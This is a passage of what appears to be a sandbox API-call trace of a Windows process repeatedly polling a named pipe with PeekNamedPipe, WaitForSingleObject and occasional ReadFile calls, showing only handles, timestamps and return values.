lpBytesLeftThisMessage=0x0) returned 1 [0110.835] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0110.887] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0110.887] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0110.972] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0110.972] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0111.325] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0111.325] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0111.409] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0111.409] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0111.440] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0111.441] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0111.473] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0111.473] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0111.503] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0111.503] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0111.534] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0111.534] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0111.566] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0111.566] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0111.596] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0111.597] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0111.630] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0111.630] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0111.659] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0111.659] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0111.690] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0111.690] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0111.734] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0111.734] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0111.752] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0111.753] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0111.784] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0111.784] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0111.815] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0111.815] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0111.846] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0111.846] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0111.877] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0111.877] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0111.908] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0111.909] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0111.940] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0111.940] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0111.971] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0111.971] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0112.002] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0112.002] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0112.033] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0112.033] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0112.064] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0112.065] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0112.096] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0112.096] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0112.127] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0112.127] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0112.158] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0112.158] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0112.189] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0112.189] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0112.220] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0112.220] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0112.253] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0112.254] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0112.283] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0112.283] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0112.323] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0112.751] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0112.802] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0112.802] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0112.844] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0112.844] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0112.959] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0112.959] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0113.352] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0113.758] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0113.799] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0113.803] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0113.841] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0113.841] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0114.116] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.116] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0114.250] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.250] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0114.333] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.342] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0114.374] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.374] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0114.421] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x46, lpBytesLeftThisMessage=0x0) returned 1 [0114.423] ReadFile (in: hFile=0xb0, lpBuffer=0x18fb08, nNumberOfBytesToRead=0x46, lpNumberOfBytesRead=0x18f88c, lpOverlapped=0x0 | out: lpBuffer=0x18fb08*, lpNumberOfBytesRead=0x18f88c*=0x46, lpOverlapped=0x0) returned 1 [0114.427] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0114.743] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.743] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0114.883] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.883] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0114.904] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.905] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0114.940] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.941] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0114.966] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.967] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0115.019] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x4e, lpBytesLeftThisMessage=0x0) returned 1 [0115.019] ReadFile (in: hFile=0xb0, lpBuffer=0x18fb08, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x18f88c, lpOverlapped=0x0 | out: lpBuffer=0x18fb08*, lpNumberOfBytesRead=0x18f88c*=0x4e, lpOverlapped=0x0) returned 1 [0115.019] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0115.048] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.059] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0115.094] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.102] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0115.124] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.124] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0115.154] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.154] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0115.185] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.185] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0115.449] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.450] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0115.502] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.502] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0115.534] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.535] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0115.577] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.577] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0115.615] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.616] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0115.637] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.637] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0115.669] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.669] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0115.701] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.701] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0115.731] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.731] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0115.843] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.844] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0115.881] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.881] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0115.906] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x33, lpBytesLeftThisMessage=0x0) returned 1 [0115.906] ReadFile (in: hFile=0xb0, lpBuffer=0x18fb08, nNumberOfBytesToRead=0x33, lpNumberOfBytesRead=0x18f88c, 